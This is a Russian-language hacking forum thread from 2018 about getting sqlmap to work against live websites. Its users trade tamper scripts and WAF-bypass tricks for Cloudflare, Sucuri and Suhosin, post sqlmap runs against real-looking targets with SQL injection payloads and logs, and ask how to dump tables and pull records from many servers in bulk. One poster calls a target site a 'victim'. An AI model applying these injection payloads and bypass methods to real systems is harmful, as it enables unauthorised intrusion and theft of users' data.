Просмотр полной версии : Вопросы по SQLMap
msk_smail
14.09.2018, 14:10
всем привет , возникла ситуация, что таблицы в БД имеют имя #__users , например. При получении колонок или дампе выскакивает, что нет записей в таблице, но такое не может быть , так как на сайте очень много пользователей. Помогите, пожалуйста, это обойти. Инкапсуляция не помогает
msk_smail
14.09.2018, 14:59
man474019 said:
↑ (https://antichat.live/posts/4244406/)
try with --hex or --no-cast parameter and play with different tamper scripts
помог отдельно взятый тампер unionalltounion и --hex, причем в связке с другими тамперами он не срабатывал, только как отдельный, список таблиц сразу преобразился, спасибо
panic.ker
22.09.2018, 18:54
Ntine25 said:
↑ (https://antichat.live/posts/4245555/)
Как обойти cloudflare?
Найти реальный ip.
Для начала ознакомься
/threads/458593/ (https://antichat.live/threads/458593/)
Вопрос не в той теме. Средствами самого sqlmap'a ты не обойдешь, только подставляя валидную сессию и запрос (на которых клауд пропустил при пентесте). Но при долгой работе над сайтом - так себе затея.
Ntine25 said:
↑ (https://antichat.live/posts/4245555/)
Как обойти cloudflare?
panic.ker said:
↑ (https://antichat.live/posts/4246349/)
Найти реальный ip.
Для начала ознакомься
/threads/458593/ (https://antichat.live/threads/458593/)
Вопрос не в той теме. Средствами самого sqlmap'a ты не обойдешь, только подставляя валидную сессию и запрос (на которых клауд пропустил при пентесте). Но при долгой работе над сайтом - так себе затея.
Можно ещё попробовать нетспаркером
У него есть консоль при раскрутки SQL
Я не пробовал но при скане клауд обходится
panic.ker
22.09.2018, 20:17
Sensoft said:
↑ (https://antichat.live/posts/4246371/)
Можно ещё попробовать нетспаркером
У него есть консоль при раскрутки SQL
Я не пробовал но при скане клауд обходится
НЕ обходится. Просто пропускает, т.к. нетспаркер пропустил, "консоль" использует ту же сессию, куки, заголовки, токены etc которые использовались при скане. При смене любых параметров, которые не пропустит сам клауд, повторном скане и т.д. он вылезет снова. Инструмент в данном случае не важен. Можно просто сохранить в файл запрос и вызвать в мапе через опцию -r /path/to/file
К слову, good news, everyone! (последние сводочки)
CloudFlare отключила CAPTCHA для пользователей Tor. В качестве альтернативы предложено бесплатное решение CloudFlare Onion Service.
qwerty1qwerty
30.09.2018, 14:06
Всем привет. Нашел иньекцию. Спарсил бд на ура,но неможет найти таблицы,--hex и --no-cast не помогают.Тамперы некоторые тоже. В чем может быть проблема? и что можно сделать?
starting at 13:52:51
[13:52:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[13:52:52] [INFO] testing connection to the target URL
[13:52:54] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[13:53:00] [WARNING] WAF/IPS/IDS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Sponsor (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
(IN)
Payload: PlacementID=&Sponsor=DFGHJK'+(SELECT 'hwlL' WHERE 5397=5397 AND 8
871 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE W
HEN (8871=8871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+
CHAR(106)+CHAR(113))))+'
---
[13:53:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[13:53:00] [INFO] fetching tables for database: db_superdb
[13:53:23] [WARNING] the SQL query provided does not return any output
[13:53:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:53:24] [WARNING] the SQL query provided does not return any output
[13:53:24] [CRITICAL] unable to retrieve the tables for any database
[13:53:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times
shutting down at 13:53:24
C:\sqlmap>
qwerty1qwerty said:
↑ (https://antichat.live/posts/4248488/)
Всем привет. Нашел иньекцию. Спарсил бд на ура,но неможет найти таблицы,--hex и --no-cast не помогают.Тамперы некоторые тоже. В чем может быть проблема? и что можно сделать?
starting at 13:52:51
[13:52:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[13:52:52] [INFO] testing connection to the target URL
[13:52:54] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[13:53:00] [WARNING] WAF/IPS/IDS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Sponsor (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
(IN)
Payload: PlacementID=&Sponsor=DFGHJK'+(SELECT 'hwlL' WHERE 5397=5397 AND 8
871 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE W
HEN (8871=8871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+
CHAR(106)+CHAR(113))))+'
---
[13:53:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[13:53:00] [INFO] fetching tables for database: db_superdb
[13:53:23] [WARNING] the SQL query provided does not return any output
[13:53:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:53:24] [WARNING] the SQL query provided does not return any output
[13:53:24] [CRITICAL] unable to retrieve the tables for any database
[13:53:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times
shutting down at 13:53:24
C:\sqlmap>
Такая же ***ня
Тоже MsSQL
Parameter: GET
Type: boolean-based blind
Таблицы и колонки выходят нормально.
Когда делаю дамп выходит такое
[09:08:55] [INFO] retrieved:
[09:08:57] [INFO] resumed: ?????????????????????
[09:08:59] [INFO] retrieving the length of query output
[09:09:01] [INFO] retrieved:
[09:09:02] [INFO] resumed: ?????????????????????
Нашел, что надо задать кодировку вывода.
Как правильно написать запрос?
Подскажите есть ли возможность обойти waf от sucuri.
все способы с гугла опробовал..
zifus said:
↑ (https://antichat.live/posts/4249493/)
Подскажите есть ли возможность обойти waf от sucuri.
все способы с гугла опробовал..
Смотря какой вид SQL инъекции, где и что еще дополнительно меняет/фильтрует запрос и тд. А так, да, руками Sucuri обходится, но с не большими нюансами, на счёт tamper скриптов от sqlmap не уверен, что там из стандартного набора получиться обойти без проблем и блокировки, разве что только переписать/написать свой.
P.S. Вы плохо гуглите, информации из гугла по методам обходам WAF, хватит для обхода!
o314um said:
↑ (https://antichat.live/posts/4250945/)
vasyaz said:
↑ (https://antichat.live/posts/4249464/)
Parameter: GET
Type: boolean-based blind
Таблицы и колонки выходят нормально.
Когда делаю дамп выходит такое
[09:08:55] [INFO] retrieved:
[09:08:57] [INFO] resumed: ?????????????????????
[09:08:59] [INFO] retrieving the length of query output
[09:09:01] [INFO] retrieved:
[09:09:02] [INFO] resumed: ?????????????????????
Нашел, что надо задать кодировку вывода.
Как правильно написать запрос?
совсем все данные так выводятся?
попробуй --hex
Делаю любой дамп колонок выходит
[09:08:59] [INFO] retrieving the length of query output
[09:09:01] [INFO] retrieved:
[09:09:02] [INFO] resumed: ?????????????????????
--no-cast --hex - не помогло
Ne0h16xor
14.10.2018, 10:42
python2 sqlmap.py -u http://bunnycredits.com/index.php?a=showproduct&id=180 --random-agent --threads=10 --dbs
/data/data/com.termux/files/usr/bin/sh: 2: --random-agentt: not found кто знает почему такая херня
o314um said:
↑ (https://antichat.live/posts/4252197/)
а руками если в брайзер выводить - нормально?
в слепой нет же вывода.
--random-agent с одной "t"
o314um said:
↑ (https://antichat.live/posts/4252197/)
а руками если в брайзер выводить - нормально?
В браузере вообще не выводится. Пробовал тамперы не помогло. Может есть какой то определенный тампер для этого? В этой теме видел, что у человека такая же проблема была, писал про кодировку.
Еще выводится такая строчка...
[22:49:09] [INFO] heuristics detected web page charset 'windows-1252'
Выставлял --charset=utf8, --charset=windows-1251, --charset=windows-1252
vasyaz said:
↑ (https://antichat.live/posts/4252475/)
В браузере вообще не выводится. Пробовал тамперы не помогло. Может есть какой то определенный тампер для этого? В этой теме видел, что у человека такая же проблема была, писал про кодировку.
Еще выводится такая строчка...
[22:49:09] [INFO] heuristics detected web page charset 'windows-1252'
Выставлял --charset=utf8, --charset=windows-1251, --charset=windows-1252
Посмотрите в сторону логов запрос/ответ, могу допустить, что на сервере стоит фаерволл и он блокирует попытки слить данные из БД, на что скрипт отвечает Вам ? символами такое часто случается. Или как вариант который уже советовали, что-то не так с запросом и скрипт должным образом не выполняется на сервере, возьмите 2 запроса из скрипта где он пытается получить какой-либо символ 1-true, 2-false и проверьте руками, все ли верно там с выводом данных на странице, ответом сервера и так далее!
P.S. Попробуйте еще явно указать скрипту варианты по которым ему определять True или False запрос, например --code=200, --string="Antichat" (--not-string="Antichat"), --regex, --titles (если заголовок меняется) и так далее, это как очередное допущение, не более
msk_smail
01.11.2018, 10:37
Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
Code:
--fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
Code:
back-end DBMS: MySQL unknown
[09:35:14] [INFO] fetching database names
[09:35:14] [INFO] fetching number of databases
[09:35:14] [PAYLOAD] 1'"
[09:35:14] [WARNING] reflective value(s) found and filtering out
[09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
[09:35:14] [INFO] retrieved:
[09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
[09:35:14] [ERROR] unable to retrieve the number of databases
[09:35:14] [INFO] falling back to current database
[09:35:14] [INFO] fetching current database
[09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
[09:35:15] [INFO] retrieved:
[09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
[09:35:15] [CRITICAL] unable to retrieve the database names
msk_smail
01.11.2018, 18:59
man474019 said:
↑ (https://antichat.live/posts/4257100/)
Hi
you can try with this, it's says you wich sqlmap tamper script can help you bypass this WAF
https://www.kitploit.com/2018/10/atlas-quick-sqlmap-tamper-suggester.html
https://github.com/m4ll0k/Atlas
https://cdn1.savepice.ru/uploads/2018/11/1/3e498ccb6c33a534a567495f7a5b1616-full.png (https://savepice.ru)
msk_smail
02.11.2018, 11:21
Единственное, что еще нашел - на сервере установлен Suhosin patch , но они сразу пишут какой тампер использовать, я через него и раскрутил уязвимость , но вот с выводом беда (((
Code:
[10:16:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[10:16:25] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
[10:16:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (bool*int)
Payload: class=27&id=(1291=1291)*2659*/!'
---
Хочу сделать чтобы sqlmap автоматом вытягивал нужные мне записи из списка баз на каждом сервере.
Подскажите, можно ли указать дамп нужных мне таблиц и колонок используя регулярные выражения? Пробовал --search, но он не работает в связке с --dump.
BabaDook
03.11.2018, 16:12
msk_smail said:
↑ (https://antichat.live/posts/4257084/)
Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
Code:
--fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
Code:
back-end DBMS: MySQL unknown
[09:35:14] [INFO] fetching database names
[09:35:14] [INFO] fetching number of databases
[09:35:14] [PAYLOAD] 1'"
[09:35:14] [WARNING] reflective value(s) found and filtering out
[09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
[09:35:14] [INFO] retrieved:
[09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
[09:35:14] [ERROR] unable to retrieve the number of databases
[09:35:14] [INFO] falling back to current database
[09:35:14] [INFO] fetching current database
[09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
[09:35:15] [INFO] retrieved:
[09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
[09:35:15] [CRITICAL] unable to retrieve the database names
Может есть смысл руками ?
Скажите, что делает суффикс -BR (--suffix="-BR")?
loidez said:
↑ (https://antichat.live/posts/4257721/)
Скажите, что делает суффикс -BR (--suffix="-BR")?
добавляет окончание ко всем твоим реквестам
http://site/injection.php?param=1+union+select+123-BR
http://site/injection.php?param=1+union+select+@@version-BR
идея понятна?
loidez said:
↑ (https://antichat.live/posts/4257721/)
Скажите, что делает суффикс -BR (--suffix="-BR")?
-BN часто юзают при консольном вызове mysql, дабы отключить форматирование, откуда "BR" и причем тут sqlmap, есть предыстория)?
BigBear said:
↑ (https://antichat.live/posts/4257767/)
добавляет окончание ко всем твоим реквестам
http://site/injection.php?param=1+union+select+123-BR
http://site/injection.php?param=1+union+select+@@version-BR
идея понятна?
Про сам суффикс это понятно, вопрос про его использование в контекста самого языка MySQL
To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix. This is a typical Blind SQL Injection
loidez said:
↑ (https://antichat.live/posts/4257826/)
Про сам суффикс это понятно, вопрос про его использование в контекста самого языка MySQL
значение суфикса аномальное, о чем я уже отписался выше. "вопрос про его использование в контекста самого языка MySQL" его используют чтобы кастомезировать выборку из базы, прикрутить лимит или какое то неординарное условие. по факту --suffix просто добавляет строку в конец запроса, о чем собственно сообщил BigBear (https://antichat.live/members/69926/)
msk_smail said:
↑ (https://antichat.live/posts/4244412/)
помог отдельно взятый тампер unionalltounion и --hex, причем в связке с другими тамперами он не срабатывал, только как отдельный, список таблиц сразу преобразился, спасибо
Приветствую, как вы пришли к решению включить именно этот тампер?
msk_smail said:
↑ (https://antichat.live/posts/4244412/)
помог отдельно взятый тампер unionalltounion и --hex, причем в связке с другими тамперами он не срабатывал, только как отдельный, список таблиц сразу преобразился, спасибо
Спасибо, этот тампер помог слепую раскрутить, версию определяло, а дальше не шло дело, подрубил этот тампер и сразу всё раскрутило.
Всем привет.
Выдало такие данные, можно ли тут что нибудь сделать?
[11:47:24] [INFO] testing connection to the target URL
[11:47:24] [WARNING] potential permission problems detected ('Access denied')
[11:47:24] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[11:47:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:47:24] [INFO] heuristics detected web page charset 'ascii'
[11:47:24] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
do you want sqlmap to try to detect backend WAF/IPS? [y/N] y
[11:51:05] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
[11:51:06] [INFO] using WAF scripts to detect backend WAF/IPS protection
[11:51:26] [CRITICAL] WAF/IPS identified as 'CloudFlare Web Application Firewall (CloudFlare)'
are you sure that you want to continue with further target testing? [y/N] y
[11:56:24] [WARNING] please consider usage of tamper scripts (option '--tamper')
[11:56:24] [INFO] testing if the target URL content is stable
[11:56:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
я в этом деле новичок, не подскажешь конкретно что это и что с этим можно сделать?
Изменяюсь за нубские вопросы.
karkajoi
16.11.2018, 16:04
Там же написано, .use different tamper scripts, пробуй тампер скрипты, в мапе они есть , как пользльзоватся гугли
717u717 said:
↑ (https://antichat.live/posts/4260801/)
Всем привет.
Выдало такие данные, можно ли тут что нибудь сделать?
[11:47:24] [INFO] testing connection to the target URL
[11:47:24] [WARNING] potential permission problems detected ('Access denied')
[11:47:24] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[11:47:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:47:24] [INFO] heuristics detected web page charset 'ascii'
[11:47:24] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
do you want sqlmap to try to detect backend WAF/IPS? [y/N] y
[11:51:05] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
[11:51:06] [INFO] using WAF scripts to detect backend WAF/IPS protection
[11:51:26] [CRITICAL] WAF/IPS identified as 'CloudFlare Web Application Firewall (CloudFlare)'
are you sure that you want to continue with further target testing? [y/N] y
[11:56:24] [WARNING] please consider usage of tamper scripts (option '--tamper')
[11:56:24] [INFO] testing if the target URL content is stable
[11:56:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
Оставь всё как есть только теперь добавь --tamper=unionalltounion
и отпиши
Sensoft said:
↑ (https://antichat.live/posts/4261015/)
Оставь всё как есть только теперь добавь --tamper=unionalltounion
и отпиши
[13:58:06] [INFO] loading tamper module 'unionalltounion'
[13:58:07] [INFO] testing connection to the target URL
[13:58:07] [WARNING] potential permission problems detected ('Access denied')
[13:58:07] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[13:58:07] [INFO] testing if the target URL content is stable
[13:58:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
717u717 said:
↑ (https://antichat.live/posts/4261195/)
[13:58:06] [INFO] loading tamper module 'unionalltounion'
[13:58:07] [INFO] testing connection to the target URL
[13:58:07] [WARNING] potential permission problems detected ('Access denied')
[13:58:07] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[13:58:07] [INFO] testing if the target URL content is stable
[13:58:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
CloudFlare tamper скриптами из коробки не обходится, а то я смотрю Вам тут насоветовали.
.SpoilerTarget" type="button">Spoiler: Крик души
Если этот ресурс Вам встал по перёк горла и кровь из носу нужно достать данные из Базы Данных, то почитайте не как пользоваться SQLmap и передавать все подряд команды скрипту в надежде на успех. А как руками раскручивать инъекции в БД, после откройте еще раз поисковик google и прочтите как обходят WAF и примените советы из этих статей на своей жертве. Если после всех манипуляций у Вас ничего не выйдет, то у нас на форуме есть тема "Вопросы по уязвимостям", обращайтесь туда с запросом и что и как выделали и что не получается!
717u717 said:
↑ (https://antichat.live/posts/4261195/)
[13:58:06] [INFO] loading tamper module 'unionalltounion'
[13:58:07] [INFO] testing connection to the target URL
[13:58:07] [WARNING] potential permission problems detected ('Access denied')
[13:58:07] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[13:58:07] [INFO] testing if the target URL content is stable
[13:58:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
Естественно не обходится, 1е это обычные паблик скрипты, 2е в CloudFlare явно работают люди у которых эти скрипты в первую очередь забанены.
msk_smail
19.11.2018, 18:26
aZohan said:
↑ (https://antichat.live/posts/4259561/)
Приветствую, как вы пришли к решению включить именно этот тампер?
Ставил -v3, в результате чего были видны запросы, который шлет Sqlmap - unionalltounion.py заменяет UNION ALL SELECT на UNION SELECT, это как раз те самые запросы в БД, когда вытягиваешь списки чего-либо, но даже если это не поможет в другом случае, то есть смысл использовать этот тампер в сопряжении с еще каким-нибудь, либо вообще другие пробовать. Так или иначе нужно вначале смотреть какой тип SQL и что конкретно фильтруется
msk_smail
19.11.2018, 18:33
loidez said:
↑ (https://antichat.live/posts/4257635/)
Хочу сделать чтобы sqlmap автоматом вытягивал нужные мне записи из списка баз на каждом сервере.
Подскажите, можно ли указать дамп нужных мне таблиц и колонок используя регулярные выражения? Пробовал --search, но он не работает в связке с --dump.
--where=DUMPWHERE Использовать условие WHERE при дампинге таблиц , это даже в мануале написано , указываете значения параметров и все гуд
Xrenovi4
04.12.2018, 22:25
Произошел обрыв сети и дамп прекратился без сохранения результатов.
Подскажите, как из файла session.sqlite вытащить данные которые успело получить?
Xrenovi4 said:
↑ (https://antichat.live/posts/4266228/)
Произошел обрыв сети и дамп прекратился без сохранения результатов.
Подскажите, как из файла session.sqlite вытащить данные которые успело получить?
http://sqlitebrowser.org
подскажите, есть txt файл с уязвмимыми ссылками, как скормить sqlmapу этот файл что бы проверял по очередности?
СПС
"sqlmap.py -m" нашел)
Подскажите, как правильно "скормить" ссылку в SQLMAP такого вида:
GET /top-albums.asp?syears=(select%20convert(int%2cCHAR(52) %2bCHAR(67)%2bCHAR(117)%2bCHAR(80)%2bCHAR(50)%2bCH AR(65)%2bCHAR(89)%2bCHAR(86)%2bCHAR(66)%2bCHAR(99) %2bCHAR(121))%20FROM%20syscolumns)
vladF said:
↑ (https://antichat.live/posts/4266281/)
Подскажите, как правильно "скормить" ссылку в SQLMAP такого вида:
GET /top-albums.asp?syears=(select%20convert(int%2cCHAR(52) %2bCHAR(67)%2bCHAR(117)%2bCHAR(80)%2bCHAR(50)%2bCH AR(65)%2bCHAR(89)%2bCHAR(86)%2bCHAR(66)%2bCHAR(99) %2bCHAR(121))%20FROM%20syscolumns)
sqlmap -u "site/top-albums.asp?syears=" -p "syears" --dbs --random-agent
Xrenovi4
06.12.2018, 19:20
Не хочет распаршивать сайт и подключаться к нему
Мап вообще не коннектится, первый раз такая хрень, хотя сайт работает. Подскажите как можно побороться
Code:
[15:18:07] [CRITICAL] unable to connect to the target URL ('??????????? ?? ???????????, ?.?. ???????? ????????? ?????? ?????? ?? ???????????'). sqlmap is going to retry the request(s)
[15:18:07] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
[15:18:11] [CRITICAL] unable to connect to the target URL ('??????????? ?? ???????????, ?.?. ???????? ????????? ?????? ?????? ?? ???????????')
Подскажите. Вообщем дампится таблица, в колонке email, считал как emaiq (q - не подтвержденный символ)
Соответственно эту колонку он вообще не сдампил, пропустил, так же еще одну last name извлек не корректно и пропустил.
Что теперь можно сделать? Я так понял нельзя запустить на отдельную проверку не правильно извлеченных символов. Только запускать повторно?
Вроде скульмап больше не обновляетца, зачем вы его юзаете?
Xrenovi4
09.12.2018, 15:07
artkar said:
↑ (https://antichat.live/posts/4267310/)
Вроде скульмап больше не обновляетца, зачем вы его юзаете?
http://prntscr.com/lsms8x
ms13 (https://antichat.live/members/266395/), серьезно? для тебя вот это сообщение "Вроде скульмап больше не обновляетца, зачем вы его юзаете?" показалось самым интересным и требующим ответа? )))))))))))))
тест на Скульмап проходят все базовые пентесты, со скульмапом вы не сломаете ни один современный сервис
artkar said:
↑ (https://antichat.live/posts/4267336/)
тест на Скульмап проходят все базовые пентесты, со скульмапом вы не сломаете ни один современный сервис
какое смелое утверждение ))))))))) хватит засорять топик и писать бред. ответа на свой вопрос получить не могу, когда на твой бред еще кто-то отвечает((((
ms13 said:
↑ (https://antichat.live/posts/4267342/)
Для меня да,
@artkar (https://antichat.live/members/293301/)
давно не появлялся...
ПС: прости, что тебя не спросил, кому мне писать.
В личку на тему такого бреда можете пообщаться? Название темы прочитайте. Подобные дискуссии: скулмап не обновляеЦа, со скулмапом ничего не сломать, не для этого топика
panic.ker
09.12.2018, 15:42
artkar said:
↑ (https://antichat.live/posts/4267336/)
тест на Скульмап проходят все базовые пентесты, со скульмапом вы не сломаете ни один современный сервис
Ты серьезно блять? Ох и цирк. Ну если ты юзер агент оставляешь стандартным, маповским, то да А так, как его спалят? Он использует все те же техники, что и абсолютно любой софт,что и твой говноскрипт, что и твои руки при упорстве, только техники эти более универсальные и расширенные, можно допиливать под себя что угодно, исходники открыты, использовать тамперы, обходить даже клаудфлэйр, не говоря о простейших WAF. Еще он обновляется регулярно! Спосируется все это дело не хуем с горы, а netsparker'ом (Web Application Security Scanner).
Если в современном сервисе нет sql-inj то конечно ты его не сломаешь с мапом. А если есть, то *** кто что спалит. И поддерживает он АБСОЛЮТНО ВСЁ, или под все настраивается вполне (Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB and H2 database management systems.)
А теперь посмотри, на отчеты за последние 10 дней, на самых "современных" сервисах, где обнаружены sql-inj:
https://vulners.com/search?query=sql injection last 10 days (https://vulners.com/search?query=sql%20injection%20last%2010%20days)
Чем это все крутилось, как ты думаешь?
В общем ты или тонкий тролль, или толстый тормоз. Склоняюсь ко второму.
Estet на кодебай, где ты изначально создавал тему, в соседней ветке по кодировке и выводу из бд мапом твой ответ. Не умеешь искать-не засоряй остальные форумы! Заебал!
panic.ker said:
↑ (https://antichat.live/posts/4267347/)
Estet на кодебай, где ты изначально создавал тему, в соседней ветке по кодировке и выводу из бд мапом твой ответ. Не умеешь искать-не засоряй остальные форумы! Заебал!
Во-первых, можно и не дерзить!
Во-вторых, тема для подобных вопросов и создана, это вы тут флуд разводите, своими тупыми вопросами и ответами на эту тупые вопросы.
Я задал конкретный вопрос и не надо меня отправлять в топики по кодировке и прочее. Не знаешь ответа, пройди мимо!
panic.ker
09.12.2018, 16:00
Тебе никто ничем не обязан, если ты не желаешь ради себя любимого и своих целей даже разобраться в вопросе или заюзать поиск. Свободен, ответа не получишь, тем более он уже есть. За тебя его поискать? Может взломать за тебя, да и сразу продать и денег на биток (хотя у тебя киви наверное) закинуть? Это так не работает. Если мы тупые-иди к умным. Может поиском научат пользоваться. Хотя лучше головой бы научили канешн
panic.ker said:
↑ (https://antichat.live/posts/4267354/)
Тебе никто ничем не обязан, если ты не желаешь ради себя любимого и своих целей даже разобраться в вопросе или заюзать поиск. Свободен, ответа не получишь, тем более он уже есть. За тебя его поискать? Может взломать за тебя, да и сразу продать и денег на биток (хотя у тебя киви наверное) закинуть? Это так не работает. Если мы тупые-иди к умным. Может поиском научат пользоваться. Хотя лучше головой бы научили канешн
Я не пойму вам пообщаться не с кем?
Не нравится вопрос, пройди мимо, а дерзить и ванговать не нужно.
Еще раз, для особо тугих, повторюсь, тема для этого и создана, тут на половину сообщений можно ответить, пользуйтесь поиском, так как на 99% вопросов, есть где то в гугле ответ!
ник кстати в точку xDDD
panic.ker said:
↑ (https://antichat.live/posts/4267347/)
Ты серьезно блять? Ох и цирк. Ну если ты юзер агент оставляешь стандартным, маповским, то да
А так, как его спалят? Он использует все те же техники, что и абсолютно любой софт,что и твой говноскрипт, что и твои руки при упорстве, только техники эти более универсальные и расширенные, можно допиливать под себя что угодно, исходники открыты, использовать тамперы, обходить даже клаудфлэйр, не говоря о простейших WAF. Еще он обновляется регулярно! Спосируется все это дело не хуем с горы, а netsparker'ом (Web Application Security Scanner).
Если в современном сервисе нет sql-inj то конечно ты его не сломаешь с мапом. А если есть, то *** кто что спалит. И поддерживает он АБСОЛЮТНО ВСЁ, или под все настраивается вполне (Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB and H2 database management systems.)
А теперь посмотри, на отчеты за последние 10 дней, на самых "современных" сервисах, где обнаружены sql-inj:
https://vulners.com/search?query=sql injection last 10 days (https://vulners.com/search?query=sql%20injection%20last%2010%20days)
Чем это все крутилось, как ты думаешь?
В общем ты или тонкий тролль, или толстый тормоз. Склоняюсь ко второму.
ёоу, палегче,
Нинада пугать дядю апткара СТРАШНЫМЯ словами как то клаудфлейр, УАФ, ТАМПЕР.
Кароч смотри как происходит сдача проекта. Когда проект сдан и прошли базовые тесты, отдел тестирования запускает скульмап самым первым, к томуж его и покупать не надо, поэтому его запускают даже одиночки разработчики. Запускают и под админом и под юзерами и настройки все перебирают, и не один скульмап а другие доступные и не дорогие, а потом отдают специализирванным фирмам которые проводят продвинутые пентесты, которые проводят анализ исходного кода (автоматизированные и ручной), фаззинг и ручной пентест.
